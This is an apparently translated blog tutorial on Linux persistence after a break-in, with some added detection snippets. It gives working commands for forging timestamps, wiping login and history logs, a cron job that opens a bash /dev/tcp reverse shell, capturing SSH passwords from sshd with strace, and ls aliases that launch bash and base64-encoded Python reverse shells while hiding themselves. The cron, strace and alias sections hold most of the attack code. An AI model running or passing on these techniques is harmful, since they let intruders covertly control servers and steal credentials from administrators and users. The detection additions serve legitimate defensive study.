Linux persistence: strace monitoring, alias backdoors and cron scheduled tasks

1. Introduction

  In the previous article I introduced several ways of maintaining access. Many of them are easy to spot, or are simply conspicuous, for example because of the timestamp of a dropped file. When operations staff notice a new file they usually open it to see what it contains and check who created it, and on a host looked after by a single administrator the chance that a new file gets investigated is higher still.

  So a backdoor you leave behind sometimes needs to be hidden properly.

2. Hiding techniques

  This section covers some common hiding techniques. The deeper the hiding, the harder it is for operations staff to find the backdoor, and the longer the access lasts.

2.1. Time forgery

  Suppose a file 1.txt was created earlier. Listing the directory shows that its timestamp is clearly out of place next to the surrounding files; operations staff who see it will look into it, and if it is a Trojan it is found immediately.

ls -l

2.1.1. Modifying the timestamp

  Here we copy the timestamp of the neighbouring public folder onto 1.txt with touch -r, so that the file no longer stands out. Note that touch (with -r, -t or -d) only sets the access and modification times; the inode change time (ctime) is set by the kernel to the moment of the change and cannot be set from user space, so stat on the file still shows a ctime far newer than its mtime.

touch -r reference_file file_to_modify
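The ctime mismatch described above, shown as an added example that is not part of the original article. It forges 1.txt the way the page does, then flags any file whose ctime trails its mtime by more than a day. The file names and the 2020 reference timestamp are constructed; GNU coreutils (touch -d, stat -c) is assumed.

```bash
#!/usr/bin/env bash
# Added example: touch -r copies atime/mtime, but the kernel records the
# moment of that change as ctime and nothing in user space resets it.
# Assumes GNU coreutils (touch -d, stat -c). All file names are constructed.
set -u

work=$(mktemp -d)
ref="$work/public"          # the "believable" neighbour whose timestamp is copied
target="$work/1.txt"        # the dropped file
clean="$work/notes.txt"     # an untouched control file

printf 'legit\n' > "$ref"
touch -d '2020-01-01 00:00:00' "$ref"   # constructed: give the neighbour an old timestamp
printf 'payload\n' > "$target"
touch -r "$ref" "$target"               # the page's forgery: copy atime/mtime from $ref
printf 'notes\n' > "$clean"

# Seconds by which the inode change time (%Z) is newer than the mtime (%Y).
ctime_mtime_gap() {
    stat -c '%Z %Y' "$1" | awk '{ print $1 - $2 }'
}

# Succeeds when ctime trails mtime by more than $2 seconds (default one day):
# the content was supposedly last written long before its metadata changed.
timestomp_suspect() {
    [ "$(ctime_mtime_gap "$1")" -gt "${2:-86400}" ]
}

for f in "$target" "$ref" "$clean"; do
    if timestomp_suspect "$f"; then
        echo "SUSPECT $(ctime_mtime_gap "$f")s gap: $f"
    else
        echo "ok      $f"
    fi
done
```

Note that the reference file is flagged too: any file whose timestamp was ever set with touch carries the same trace. Over a whole tree the same test is `find / -type f -cmin -60 ! -mmin -60` (changed in the last hour, but claiming not to have been modified), which is how the forgery is usually caught.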

2.2. Hidden files

  Hidden files rely on operations staff doing only a shallow check. Prefixing a file name with a dot hides it from a plain ls, so an administrator who only runs ls while troubleshooting will not see it.

  As the listing shows, .1.txt does not appear in the output of ls; it only shows up with ls -la (or find -name '.*').

touch .1.txt

2.3. chattr command

  chattr sets extended attributes on files on ext2/3/4 and a few other filesystems; administrators use it to lock important files so they cannot be deleted or modified. We can use the same attribute to stop our file being removed, and under some circumstances an immutable file also leads operations staff to assume it is a protected system file and leave it alone. Two caveats: setting +i needs root (CAP_LINUX_IMMUTABLE), and the attribute is visible to lsattr, while an rm that fails with "Operation not permitted" even for root is itself a tell.

2.3.1. Command reference

chattr [+-=attribute] file
a: append only; the file can only be opened for appending.
A: do not update the access time of the file or directory.
c: store the file or directory compressed.
d: exclude the file or directory from dump backups.
i: immutable; the file or directory cannot be modified, deleted or renamed.
s: secure deletion; the blocks are zeroed when the file is deleted.
S: synchronous updates; changes are written to disk immediately.
u: undeletable; the contents are kept so the file can be recovered.

2.3.2. Attribute addition

  This is +i, not -i: the plus sign adds the attribute to the file.

chattr +i 1.txt

2.3.3. Attribute release

  Here the earlier +i becomes -i, which removes the attribute again so that the file can be modified or deleted.

chattr -i 1.txt
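The lsattr side of the caveat above, as an added example that is not part of the original article. lsattr prints the attribute string before each path, so a hunt only has to look for i or a in that first field. The sample output below is constructed; the live function needs root and a filesystem that supports attributes.

```bash
#!/usr/bin/env bash
# Added example: chattr +i/+a are visible to lsattr; this filters its output
# for files carrying either flag. Sample lines are constructed.

# Constructed lsattr -a output (second line imitates the page's 1.txt after chattr +i).
SAMPLE_LSATTR='--------------e------- /root/notes.txt
----i---------e------- /root/1.txt
-----a--------e------- /var/log/audit/audit.log
--------------e------- /root/.bashrc'

# Read lsattr lines on stdin; print the path of every entry whose attribute
# string (first field, letters and dashes only) contains i or a.
# Directory headers such as "/var:" contain ':' and are skipped.
flagged_from_lsattr() {
    awk '$1 ~ /^[-A-Za-z]+$/ && $1 ~ /[ia]/ { sub(/^[^ ]+ /, ""); print }'
}

# Number of flagged paths in the constructed sample.
flagged_sample_count() {
    printf '%s\n' "$SAMPLE_LSATTR" | flagged_from_lsattr | wc -l | tr -d ' '
}

# Live hunt: lsattr -R -a walks a tree; errors from procfs, tmpfs etc. are dropped.
flagged_live() {
    lsattr -R -a "${1:-/}" 2>/dev/null | flagged_from_lsattr
    return 0
}

printf '%s\n' "$SAMPLE_LSATTR" | flagged_from_lsattr
```

An append-only audit log is a legitimate use of +a, so the output is a list to review, not an alert by itself; an immutable file under /tmp, /root or a user's home usually is not.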

2.4. Historical commands

  The history command shows the commands executed in the shell (the current session's list, and ~/.bash_history once it has been written). If the commands used to run the Trojan stay in there, they will be found, so they have to be kept out of the history, that is, not recorded at all.

2.4.1. Hiding commands

  If you put a space in front of a command, bash does not record it in the history, provided the HISTCONTROL variable contains ignorespace (or ignoreboth). If the trick does not work on your system, check that variable: CentOS does not set HISTCONTROL=ignorespace by default, so set it yourself before relying on it.

history -c  # clear the current session's in-memory history list
echo > ./.bash_history  # wipe the history file on disk

  history -c only empties the list in memory; bash writes that list to HISTFILE when the session ends, so either truncate the file after logging out or unset HISTFILE first. echo > file also leaves a single newline behind, while : > file truncates it to zero bytes.

  I will not demonstrate this here, mainly because I do not know why these commands would not execute on my Linux system.

2.5. Clear login log

  Clearing these logs keeps the login IP address and similar details from being found through last and lastb. It does not touch sshd's own logging to /var/log/secure (RHEL/CentOS) or /var/log/auth.log (Debian/Ubuntu) and to the systemd journal, nor /var/log/lastlog, all of which still record the connection.

2.5.1. Clear login success log

echo > /var/log/wtmp  # binary file; last reads login times and source IPs from it
last | grep root  # no login records are shown any more

2.5.2. Clear login failure log

echo > /var/log/btmp  # binary file; lastb reads failed logins from it
lastb | grep root  # no failed-login records are shown any more
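A check on what the two echo commands above actually leave behind, as an added example that is not part of the original article. wtmp and btmp are arrays of fixed-size struct utmp records, so their size must be a multiple of the record size; echo > file writes one newline and leaves a 1-byte file that is neither empty nor a valid record. The 384-byte record size is the glibc layout on x86-64 and i386 (an assumption, stated in the code); the sample file is constructed in a temporary directory instead of touching /var/log.

```bash
#!/usr/bin/env bash
# Added example: classify a utmp-format file by size. Record size assumed to
# be glibc's 384 bytes (x86-64 and i386). The sample wtmp is constructed.
UTMP_RECORD=384

# Print "empty", "<n> records", or "corrupt (...)" for the file in $1.
wtmp_status() {
    size=$(wc -c < "$1" | tr -d ' ')
    if [ "$size" -eq 0 ]; then
        echo "empty"
    elif [ $((size % UTMP_RECORD)) -eq 0 ]; then
        echo "$((size / UTMP_RECORD)) records"
    else
        echo "corrupt ($size bytes, not a multiple of $UTMP_RECORD)"
    fi
}

work=$(mktemp -d)
# Constructed stand-in for /var/log/wtmp: three zero-filled records.
head -c $((3 * UTMP_RECORD)) /dev/zero > "$work/wtmp"
wtmp_status "$work/wtmp"        # 3 records

echo > "$work/wtmp"             # the page's clearing command
wtmp_status "$work/wtmp"        # corrupt (1 bytes, not a multiple of 384)

: > "$work/wtmp"                # clean truncation to zero length
wtmp_status "$work/wtmp"        # empty
```

Run against /var/log/wtmp and /var/log/btmp, a "corrupt" result with a fresh ctime is a direct sign of this kind of cleanup; an "empty" file on a long-running host is almost as telling, since wtmp is normally rotated, not emptied.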

3. Scheduled tasks—cron backdoor

  The cron backdoor uses the system's scheduled-task facility to bring a reverse shell back on a schedule.

3.1. Edit backdoor rebound

  Create a hidden script, put the reverse-shell address and port in it, and make it executable.

vim /etc/.backshell.sh

#!/bin/bash
bash -i >& /dev/tcp/192.168.10.10/4444 0>&1

chmod +x /etc/.backshell.sh

3.2. Add scheduled tasks

  Make the script run every minute. */1 in the minute field means the same as *. Cron starts a fresh bash -i every minute regardless of whether the previous session is still connected, so the listener sees a new connection attempt each minute.

vim /etc/crontab
*/1 * * * * root /etc/.backshell.sh

3.3. Check the rebound effect

  Listen on port 4444 on the attacking machine and wait for the shell to connect back.

nc -lvvp 4444

3.4. View traffic

  On the target host, check the connection table: there is an established connection to port 4444 on the attacker.

netstat -ant  # or ss -ant where net-tools is not installed
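A triage pass over crontab entries that would catch the job above, as an added example that is not part of the original article. It drops comments and variable assignments, then flags job lines that reference a hidden path or a reverse-shell primitive (/dev/tcp, nc/ncat/socat, base64, python -c, curl|sh). The sample crontab is constructed; the indicator list is a starting point, not a complete one.

```bash
#!/usr/bin/env bash
# Added example: indicator grep over crontab text. Sample is constructed.

# Constructed /etc/crontab-style sample (minute hour dom month dow user command).
SAMPLE_CRONTAB='SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/1 * * * * root /etc/.backshell.sh
0 3 * * * backup /usr/local/bin/backup.sh --full
* * * * * www-data bash -c "bash -i >& /dev/tcp/192.168.10.10/4444 0>&1"
@reboot root /usr/bin/python -c "$(echo aW1wb3J0IHNvY2tldA== | base64 -d)"'

# Hidden path component, /dev/tcp or /dev/udp, a netcat-style tool as a word,
# base64, python -c, or curl/wget piped into a shell.
INDICATORS='/\.[^/.[:space:]]|/dev/(tcp|udp)/|(^|[^[:alnum:]_])(nc|ncat|socat)([^[:alnum:]_]|$)|base64|python[23]?[[:space:]]+-c|(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh'

# Read crontab text on stdin; drop blank lines, comments and VAR=value
# assignments; print the job lines that match an indicator.
suspicious_cron_lines() {
    grep -v -E '^[[:space:]]*$|^[[:space:]]*#|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' |
    grep -E "$INDICATORS"
}

# Number of flagged lines in the constructed sample.
sample_hits() {
    printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron_lines | wc -l | tr -d ' '
}

# Live pass over the usual locations (per-user spools are root-readable only).
scan_cron_files() {
    cat /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/* 2>/dev/null |
    suspicious_cron_lines
    return 0
}

printf '%s\n' "$SAMPLE_CRONTAB" | suspicious_cron_lines
```

The hourly run-parts job and the backup job pass; the hidden /etc/.backshell.sh, the inline /dev/tcp shell and the base64-fed python -c line are reported. Scripts launched from /etc/cron.hourly and friends still need to be read, since an indicator inside them is not visible from the crontab line.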

4. Monitoring function—strace backdoor

  strace is a powerful Linux debugging and diagnostic tool that traces the system calls a program makes and the signals it receives, which is especially useful for programs whose source is unavailable or cannot be recompiled. On Linux a user process cannot touch hardware directly: to read a file from disk, receive network data and so on it must switch from user mode to kernel mode through a system call, and strace records each such call with its arguments, return value and timing. If strace shows no output the process is not necessarily blocked; it may simply be doing work that needs no interaction with the kernel. strace gets this information from the kernel through ptrace and needs no special kernel build.

  Because of this, strace attached to sshd can be abused as a keylogger.

4.1. Record sshd plaintext

  First start the recorder and wait for the next ssh login. Once a user connects, the plaintext password is written to the file you chose. Attaching to sshd requires root (ptrace of another user's process is otherwise refused, and Yama's ptrace_scope may tighten this further), and the ps|grep below only finds sshd when it was started with -D, as systemd units do.

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)  # record ssh login passwords to /tmp/.sshd.log (-F is an obsolete spelling of -f in current strace)

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log  # pull the password out of the log

  The filter is needed because a single login produces a large amount of read/write data in the file, and picking the password out by eye is hard.

4.2. Record sshd private key

  The same recorder with a larger string length (-s 4096) captures private key material that sshd itself reads, such as its host keys, in full. A client's private key never leaves the client during public-key authentication, so it cannot be captured this way.

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)  # same recorder, key material is written to the file whole

grep 'PRIVATE KEY' /tmp/.sshd.log  # read the private key

4.3. Questions

  A big problem with this approach is that the log keeps growing for as long as strace runs, since every byte sshd reads or writes is recorded. In a real environment use it sparingly: a log that fills the disk triggers a disk-space alarm and gets you discovered.

ls -al /tmp/.sshd.log
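The defender's view of an attached strace, as an added example that is not part of the original article. strace -p attaches with ptrace, and for as long as it stays attached the kernel reports the tracer in /proc/<pid>/status as TracerPid, whatever the log file is called. The status excerpts below are constructed (the real file separates fields with tabs; awk's default splitting handles both); the live function walks /proc on the host it runs on.

```bash
#!/usr/bin/env bash
# Added example: read TracerPid from /proc/<pid>/status text. Samples constructed.

# Constructed /proc/<pid>/status excerpts of an sshd traced by PID 4242, and a clean one.
SAMPLE_STATUS_TRACED='Name: sshd
State: S (sleeping)
Tgid: 812
Pid: 812
PPid: 1
TracerPid: 4242
Uid: 0 0 0 0'
SAMPLE_STATUS_CLEAN='Name: sshd
State: S (sleeping)
Pid: 812
TracerPid: 0'

# Print the TracerPid value from status text on stdin (0 = not traced,
# "unknown" if the field is missing, e.g. on a non-Linux /proc).
tracer_pid() {
    awk '$1 == "TracerPid:" { print $2; found = 1 } END { if (!found) print "unknown" }'
}

# List every live process that currently has a tracer: "pid name tracer_pid".
traced_processes() {
    for s in /proc/[0-9]*/status; do
        awk -v f="$s" '
            $1 == "Name:" { name = $2 }
            $1 == "TracerPid:" && $2 != 0 {
                sub(/^\/proc\//, "", f); sub(/\/status$/, "", f)
                print f, name, $2
            }' "$s" 2>/dev/null
    done
    return 0
}

printf '%s\n' "$SAMPLE_STATUS_TRACED" | tracer_pid   # 4242
printf '%s\n' "$SAMPLE_STATUS_CLEAN"  | tracer_pid   # 0
traced_processes
```

On a server, any sshd (or any daemon) with a non-zero TracerPid outside a debugging session deserves an immediate look at the tracer's command line and open files; the log path in the page's command is only a convention and the tracer is the reliable artefact.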

5. Command customization-Alias ​​backdoor

  alias sets an alternative name for a command in Linux; for example, you can make ls run ls -al.

5.1. Basic demonstration

  The plain ls only prints the basic listing; after the alias is set, running ls produces the output of ls -al.

alias ls='ls -al'  # set the alias
unalias ls  # remove the alias

5.2. Basic rebound

  Edit the reverse-shell address and port, set the alias, and wait for operations staff to type ls.

# turn ls into a reverse shell
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.10.10/4444 0>&1; };alerts'

5.2.1. Check the effect

  The shell connects back successfully.

nc -lvvp 4444

5.2.2. Problem

  ls does run, but afterwards the terminal hangs and cannot be used: bash -i runs in the foreground of the alias function, so the ls command only returns when the attacker closes the session. This is immediately obvious to the victim.

5.3. Advanced version rebound

  The advanced version calls Python and connects back with a socket. The payload is base64-encoded (encoding, not encryption) and picks str or bytes from sys.version_info so that it runs under both Python 2 and 3. Decoded, it forks, lets the parent exit so that ls returns at once, and has the child connect to 192.168.10.10:4444 and run /bin/sh -i on the socket. To adapt it, decode the string, change the IP address and port, and re-encode it.

alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMCIsIDQ0NDQpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgp=='\'')))";};alerts'


5.3.1. Execute commands

  Here the alias is bound to the ls command. There may be a small problem: python3 is not installed on some systems, so I did not test that.

5.3.2. Check the effect

  It does connect back, but it is using python and python3 is not specified, so after the connection commands cannot be executed.

nc -lvvp 4444

5.3.3. Problem

  The remaining problem is the Python version. Also, if operations staff have already set their own alias for ls, your change will certainly be noticed, and the alias is lost after a restart (or simply a new login) because it lives only in the current shell.

5.4. Sustainability

  This makes the alias survive a restart by loading it from a file at every login.

5.4.1. Modify files

vim /etc/upload  # write the three backdoor aliases below into this file
alias ls='alerts(){ ls $* --color=auto;python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMCIsIDQ0NDQpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgp=='\'')))";};alerts'

alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'

alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\''/";};alerts'


vim ~/.bashrc
# append at the end
if [ -f /etc/upload ]; then
	. /etc/upload
fi

5.4.2. Check the effect

  Not successful.

nc -lvvp 4444
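Why the laundering aliases in 5.4.1 do not hold up, as an added example that is not part of the original article. The alias and unalias wrappers only intercept the word alias when bash performs alias expansion on it; a backslash (\alias), command alias, or type -a ls skips that expansion and prints the real definition. The rc fragment below is a constructed imitation of /etc/upload with the reverse-shell payload replaced by a harmless marker; it is sourced from a temporary file, not from /etc.

```bash
#!/usr/bin/env bash
# Added example: the page's "alias alias=" trick launders only output reached
# through alias expansion. Constructed rc file; payload replaced by a marker.
shopt -s expand_aliases 2>/dev/null || true   # bash scripts need this; dash expands by default

rc=$(mktemp)
# Constructed imitation of the page's /etc/upload: a wrapped ls plus a laundering alias.
cat > "$rc" <<'EOF'
alias ls='alerts(){ command ls "$@" --color=auto; echo "MARKER: payload would run here" >&2; };alerts'
alias alias='alerts(){ command alias "$@" | sed "s/alerts.*/ls --color=auto'\''/"; };alerts'
EOF
. "$rc"

# What an administrator sees when typing "alias ls": expansion routes the
# word alias through the wrapper, which rewrites the definition.
laundered_definition() { eval 'alias ls'; }

# The same query with expansion bypassed by a backslash: the real builtin runs.
real_definition() { eval '\alias ls'; }

# Succeeds when the two differ, i.e. the alias builtin itself has been wrapped.
alias_is_laundered() {
    [ "$(laundered_definition)" != "$(real_definition)" ]
}

laundered_definition   # alias ls='ls --color=auto'
real_definition        # alias ls='alerts(){ command ls "$@" ...MARKER... };alerts'
rm -f "$rc"
```

In bash, type -a ls and declare -f alerts show the same thing, and bash --norc --noprofile gives a shell with no aliases at all for comparison. The practical check is therefore not alias alone but \alias, type -a, and a grep of every file the login shell sources (here the . /etc/upload line appended to ~/.bashrc) for function-wrapped aliases.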

6. Kernel loads LKM-Rootkit backdoor

  Most Linux backdoors establish their connection with msf, and such TCP connections are found by operations staff, so what we want is a backdoor whose traffic is not a plain TCP connection and does not arouse suspicion, and which can also manage a large number of shells. Reptile is an LKM rootkit of exactly this kind: well hidden and powerful.

  reptile

  Usage reference

  I had planned to write this part, but found that the kernel versions of so many servers fall outside the tool's tested range, and I was too lazy to find a local image, so in the meantime you can look at the write-ups by other authors. The tool was discontinued in 2020; how much longer it remains usable is anyone's guess.

7. Linux detection tools

  GScan is a program designed to help security incident responders check Linux hosts: it runs an automatic, comprehensive host-side checklist and aggregates the results to trace the path the attacker took.

  Other tools on Linux: chkrootkit, rkhunter, OSSEC, zeppoo, etc.

  On Windows: BlackLight, RootkitRevealer, Rootkit Hook Analyzer

Origin blog.csdn.net/weixin_44268918/article/details/132452794